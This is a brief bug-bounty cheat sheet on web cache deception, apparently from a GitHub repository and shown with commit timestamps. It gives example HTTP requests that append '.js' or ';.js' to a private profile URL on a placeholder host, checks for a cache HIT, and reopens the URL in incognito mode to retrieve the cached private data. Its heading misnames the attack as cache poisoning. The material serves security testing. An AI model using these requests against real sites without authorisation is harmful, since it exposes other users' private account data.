AllAboutBugBounty/Web Cache Deception.md

52 lines
1.3 KiB
Markdown
Raw Normal View History

2022-09-03 09:31:44 +00:00
# Web Cache Poisoning
## Introduction
Web Cache Deception is an attack in which an attacker deceives a caching proxy into improperly storing private information sent over the internet and gaining unauthorized access to that cached data
## Where to find
`-`
## How to exploit
2022-09-03 09:36:47 +00:00
* Normal Request (For example in the settings profile feature)
2022-09-03 09:31:44 +00:00
```
GET /profile/setting HTTP/1.1
Host: www.vuln.com
```
The response is
```
HTTP/2 200 OK
Content-Type: text/html
Cf-Cache-Status: HIT
...
```
1. Try to add cacheable extension (For example .js / .css / .jpg, etc.)
```
GET /profile/setting/.js HTTP/1.1
Host: www.vuln.com
```
The response is
```
HTTP/2 200 OK
Content-Type: text/html
Cf-Cache-Status: HIT
...
```
2022-09-03 09:36:47 +00:00
If the `Cf-Cache-Status` response the request with `HIT` not `MISS` or `Error`. And then try to open the url in incognito mode
2022-09-03 09:31:44 +00:00
2022-09-03 09:36:47 +00:00
1. Add `;` before the extension (For example `;.js` / `;.css` / `;.jpg`, etc.)
2022-09-03 09:31:44 +00:00
```
GET /profile/setting/;.js HTTP/1.1
Host: www.vuln.com
```
The response is
```
HTTP/2 200 OK
Content-Type: text/html
Cf-Cache-Status: HIT
...
```
2022-09-03 09:36:47 +00:00
If the `Cf-Cache-Status` response the request with `HIT` not `MISS` or `Error`. And then try to open the url in incognito mode
2022-09-03 09:31:44 +00:00
## References
* [@bxmbn](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)